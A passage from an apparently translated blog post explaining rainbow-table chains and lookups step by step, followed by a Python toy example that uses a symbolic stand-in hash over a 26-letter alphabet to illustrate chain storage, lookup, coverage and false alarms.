<td>Hp</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>U</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hu</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>H</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hh</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>D</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hd</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>O</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Ho</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>K</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>Hk</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td>E</td>
<td style="width: 29pt;"><span style="color: #009933;">H()</span><br />
→</td>
<td>He</td>
<td style="width: 29pt;"><span style="color: blue;">R()</span><br />
→</td>
<td><span style="font-size: large;"><b><span style="color: red;">Q</span></b></span></td>
</tr>
</tbody></table>
<div style="margin: -8px 4px 8px 12px;">
<span style="color: #741b47;"><b>~~more rows below, omitted~~</b></span></div>
<div style="margin-bottom: 8px; text-indent: 2em;">
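In the end the rainbow table stores only the head and tail of each chain, the parts shown in red in the two tables above. This avoids storing the full mapping table and so saves space. How, then, is the rainbow table used when cracking? Suppose we obtain a hash value <b>Hw</b> and crack it with the <b>three-stage</b> rainbow table:</div>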
<div style="margin-bottom: 8px; margin-top: -16px;">
<ol>
<li>Pass <b>Hw</b> through the <span style="color: #990000;">reduction function</span> to get <b>T</b>.</li>
<li>Compare against the tail of every rainbow chain; <b>T</b> is found in the third chain, so that chain's head is <b>Q</b>.</li>
<li><span style="color: #38761d;">Hash</span> <b>Q</b> to get <b>Hq</b>; <b><span style="color: #990000;">Hq≠Hw</span></b></li>
<li>Feed <b>Hq</b> to the <span style="color: #990000;">reduction function</span> to get <b>V</b>, then <span style="color: #38761d;">hash</span> <b>V</b> to get <b>Hv</b>; <span style="color: #990000;"><b>Hv≠Hw</b></span></li>
<li>Feed <b>Hv</b> to the <span style="color: #990000;">reduction function</span> to get <b>W</b>, then <span style="color: #38761d;">hash</span> <b>W</b> to get <b>Hw</b>; <span style="color: blue;"><b>Hw=Hw</b></span>, so the answer is <span style="color: blue;"><b>W</b></span></li>
</ol>
</div>
<div style="margin-top: 8px;">
Likewise, cracking with the <b>seven-stage</b> rainbow table:</div>
<div style="margin-top: -16px;">
<ol>
<li>Pass <b>Hw</b> through the <span style="color: #990000;">reduction function</span> to get <b>T</b>.</li>
<li>Compare <b>T</b> against the tail of every rainbow chain; <b>T</b> is not found.</li>
<li><span style="color: #38761d;">Hash</span> <b>T</b> to get <b>Ht</b>, then <span style="color: #990000;">reduce</span> Ht to get <b>B</b>.</li>
<li>Compare <b>B</b> against the tail of every rainbow chain; <b>B</b> is not found.</li>
<li><span style="color: #38761d;">Hash</span> <b>B</b> to get <b>Hb</b>, then <span style="color: #990000;">reduce</span> <b>Hb</b> to get <b>L</b>.</li>
<li>Compare <b>L</b> against the tail of every rainbow chain; <b>L</b> is found in the second chain, so that chain's head is <b>K</b>. </li>
<li><span style="color: #38761d;">Hash</span> <b>K</b> to get <b>Hk</b>; <span style="color: #990000;"><b>Hk≠Hw</b></span></li>
<li>Feed <b>Hk</b> to the <span style="color: #990000;">reduction function</span> to get <b>E</b>, then <span style="color: #38761d;">hash</span> <b>E</b> to get <b>He</b>; <span style="color: #990000;"><b>He≠Hw</b></span></li>
<li>Feed <b>He</b> to the <span style="color: #990000;">reduction function</span> to get <b>Q</b>, then <span style="color: #38761d;">hash</span> <b>Q</b> to get <b>Hq</b>; <span style="color: #990000;"><b>Hq≠Hw</b></span></li>
<li>Feed <b>Hq</b> to the <span style="color: #990000;">reduction function</span> to get <b>V</b>, then <span style="color: #38761d;">hash</span> <b>V</b> to get <b>Hv</b>; <span style="color: #990000;"><b>Hv≠Hw</b></span></li>
<li>Feed <b>Hv</b> to the <span style="color: #990000;">reduction function</span> to get <b>W</b>, then <span style="color: #38761d;">hash</span> <b>W</b> to get <b>Hw</b>; <span style="color: blue;"><b>Hw=Hw </b></span>, so the answer is <span style="color: blue;"><b>W</b></span></li>
</ol>
</div>
<div style="margin-bottom: 8px; text-indent: 2em;">
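What if we happen to be given the hash value <b>Hy</b>? Steps 1 to 2 above are repeated, <b>seven times</b> for <b>seven-stage</b> chains and <b>three times</b> for <b>three-stage chains</b>. If no matching tail value is ever found, the hash value cannot be cracked with the current rainbow table.</div>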
<div style="margin-bottom: 8px;">
</div>
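<div style="margin-bottom: 8px;">
The chain building and lookup walked through above, as an added Python example that is not part of the original post. It reuses the page's R() table and chain heads and applies the same R() in every column, as the page does; H() is modeled symbolically ('M' hashes to 'Hm'), which is a stand-in and not a real hash, and the function names are this example's own.</div>

```python
import string

ALPHABET = string.ascii_uppercase
# R(Ha), R(Hb), ... R(Hz) copied in order from the page's reduction table.
# He and Hs both reduce to Q, Hh and Hz both reduce to D; Y and Z never appear.
REDUCE = dict(zip(ALPHABET, "MLGOQCRDNXESFJKUVIQBHWTAPD"))


def H(plain):
    """Symbolic stand-in for the hash (assumption): 'M' -> 'Hm', as on the page."""
    return "H" + plain.lower()


def R(hash_value):
    """Reduction function: look the hash value up in the page's table."""
    return REDUCE[hash_value[1].upper()]


def build_table(heads, stages):
    """Run each chain for `stages` H->R rounds and keep only {tail: head}."""
    table = {}
    for head in heads:
        value = head
        for _ in range(stages):
            value = R(H(value))
        table[value] = head
    return table


def crack(target, table, stages):
    """Return (plaintext or None, number of H() calls made)."""
    ops, candidate = 0, R(target)
    for _ in range(stages):
        head = table.get(candidate)
        if head is not None:
            value = head  # tail matched: replay the chain from its stored head
            for _ in range(stages):
                hashed = H(value)
                ops += 1
                if hashed == target:
                    return value, ops
                value = R(hashed)
            # No hit in this chain: the tail matched through an R() collision.
        candidate = R(H(candidate))  # move one column closer to the tail
        ops += 1
    return None, ops


def coverage(table, stages):
    """Plaintexts whose hash values this table can recover."""
    return {p for p in ALPHABET if crack(H(p), table, stages)[0] == p}


THREE = build_table("MIQD", 3)  # the four three-stage chains shown on the page
SEVEN = build_table("MKP", 7)   # the three seven-stage chains shown on the page

if __name__ == "__main__":
    for name, table, stages in (("3-stage", THREE, 3), ("7-stage", SEVEN, 7)):
        print(name, "stored:", table, "| Hw ->", crack("Hw", table, stages),
              "| Hy ->", crack("Hy", table, stages),
              "| covers", len(coverage(table, stages)), "of 26")
```

With only the chains shown on the page, three stored head/tail pairs of seven-stage chains cover 19 of the 26 plaintexts, while four three-stage pairs cover 12. Looking up Hs in the seven-stage table shows a false alarm: the tail Q matches only because He and Hs both reduce to Q, so replaying that chain never reproduces Hs.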
<div style="margin-bottom: 8px; text-indent: 2em;">
That is roughly how a rainbow table works. Now I finally know that it is <b><span style="color: #990000;">not</span></b> a complete <b>plaintext-to-hash</b> lookup table.</div>
</div>
雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com2